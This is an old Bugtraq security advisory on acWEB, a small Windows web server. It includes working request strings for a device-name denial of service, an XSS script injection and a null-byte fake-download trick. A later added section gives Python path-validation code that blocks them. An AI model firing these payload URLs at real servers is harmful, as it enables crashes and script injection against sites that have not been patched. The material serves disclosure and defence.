From downbload@hotmail.com Wed Sep 25 18:24:52 2002
From: DownBload
To: bugtraq@securityfocus.com
Date: 25 Sep 2002 09:08:20 -0000
Subject: IIL Advisory: Vulnerabilities in acWEB HTTP server

[ Illegal Instruction Labs Advisory ]
[-------------------------------------------------------------------------]
Advisory name:   Vulnerabilities in acWEB HTTP server
Advisory number: 13
Application:     acWEB HTTP server
Author e-mail:   spf@users.sourceforge.net
Homepage:        somewhere on sourceforge
Date:            10.09.2002
Impact:          DoS, XSS, etc.
Tested on:       Windows 98
Discovered by:   DownBload
Mail me @:       downbload@hotmail.com

======[ Overview

Sourceforge: "acWEB is an OpenSource replacement for MS IIS and other proprietary WEB servers for Windows. Unlike IIS, acWEB is not affected by viruses like CodeRed, Nimda, etc :)."

/ME says: acWEB is a simple HTTP server for Windows. It is perfect for tiny companies, and for home use.

======[ Problem(s)

===[ Remote DoS

The first vulnerability which I discovered in acWEB HTTP server was a remote DoS. It is possible to crash acWEB (and Windows too) with a simple HTTP request:

---cut here---
http://www.victim.com/com2.bat
---cut here---

===[ XSS a.k.a CSS bug

XSS code execution:

---cut here---
http://www.victim.com/%db<script>alert('Illegal%20Instruction%20Labs%200wnz%20YoU!!!');</script>/
---cut here---

===[ Fake file download

---cut here---
http://www.victim.com/|%5chacked.txt%00
---cut here---

When this request is sent to acWEB HTTP server, acWEB will return:

---------------
HTTP/1.0 200 OK
Content-Length: 0
Connection: Close
Content-Type: application/octet-stream
Server: Eserv/3.x
---------------

That is fuqn weird, because the file 'hacked.txt' doesn't exist. acWEB HTTP server will send us 'hacked.txt' as an empty file to download.

======[ Exploit

This can be exploited with a browser, so I won't write an exploit for this... or maybe one day :).

======[ Greetz

Greetz goes to #hr.hackers, #ii-labs and #linux .
Special greetz goes to (rand()): St0rm, BoyScout, h4z4rd, finis, Sunnis, Fr1c, phreax, LekaMan, StYx, harlequin, Astral and www.active-security.org (NetZero & Paradox). I'm very sorry if I forgot someone.
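The three problems above share one root cause: the server hands a decoded request path straight to the Windows filesystem and echoes it back unescaped. The following is an added example of the request-path checks a small Windows HTTP server would need to close all three; it is not code from the advisory or from acWEB, and the function names, the reserved-device list and the temporary document root are this example's own constructions. It rejects reserved DOS device names (the `/com2.bat` case), NUL bytes, pipes and other characters that are illegal in Windows file names (the `|%5chacked.txt%00` case), HTML-escapes the path before it appears in an error page (the XSS case), and answers 404 instead of an empty 200 when the resolved file does not exist.

```python
import html
import os
import tempfile
from urllib.parse import unquote

# Names Windows reserves for devices. Opening one through the filesystem, even
# with an extension appended (com2.bat), talks to the device instead of a file,
# which is how a single request path like /com2.bat can hang the server.
_RESERVED_DEVICES = (
    {"CON", "PRN", "AUX", "NUL"}
    | {f"COM{i}" for i in range(1, 10)}
    | {f"LPT{i}" for i in range(1, 10)}
)

# Characters that are not valid in Windows file names, plus the NUL byte, which
# C runtime calls treat as end of string (truncating whatever follows it).
_BAD_CHARS = set('<>:"|?*\\\x00')


def check_request_path(raw_path: str):
    """Return (ok, reason) for a percent-encoded request-URI path.

    Decodes once, then rejects anything that must never reach the filesystem.
    """
    path = unquote(raw_path)
    bad = sorted(_BAD_CHARS.intersection(path))
    if bad:
        return False, "forbidden character(s) %r in path" % "".join(bad)
    for segment in path.split("/"):
        if segment in ("", "."):
            continue
        if segment == "..":
            return False, "parent-directory traversal"
        # Device names are matched on the stem, case-insensitively, with
        # trailing spaces ignored, as Windows does.
        stem = segment.split(".", 1)[0].rstrip(" ").upper()
        if stem in _RESERVED_DEVICES:
            return False, "reserved device name %s" % stem
    return True, ""


def error_body(raw_path: str) -> str:
    """HTML for a 4xx page that echoes the request without letting it execute."""
    return "<html><body>Not found: %s</body></html>" % html.escape(unquote(raw_path))


def resolve_under_root(docroot: str, raw_path: str):
    """Map a request path to an existing regular file under docroot, or None.

    A None result must become a 404; answering 200 with Content-Length: 0 for
    a missing file is the "fake file download" behaviour the advisory shows.
    """
    ok, _reason = check_request_path(raw_path)
    if not ok:
        return None
    root = os.path.realpath(docroot)
    candidate = os.path.realpath(os.path.join(root, unquote(raw_path).lstrip("/")))
    if not candidate.startswith(root + os.sep):
        return None
    return candidate if os.path.isfile(candidate) else None


def demo_docroot() -> str:
    """Create a throwaway document root holding one page (constructed sample data)."""
    root = tempfile.mkdtemp(prefix="acweb_demo_")
    with open(os.path.join(root, "index.html"), "w") as f:
        f.write("<html><body>hello</body></html>")
    return root


if __name__ == "__main__":
    # The three request paths from the advisory, plus an ordinary one.
    for p in ("/com2.bat",
              "/%db<script>alert('x');</script>/",
              "/|%5chacked.txt%00",
              "/index.html"):
        print(p, check_request_path(p))
```

The checks run on the decoded path exactly once; decoding a second time after validation would reopen the door to double-encoded variants. The device-name list covers COM1 to COM9 and LPT1 to LPT9; the check is on the stem of each path segment because Windows treats `com2.bat` and `com2` alike.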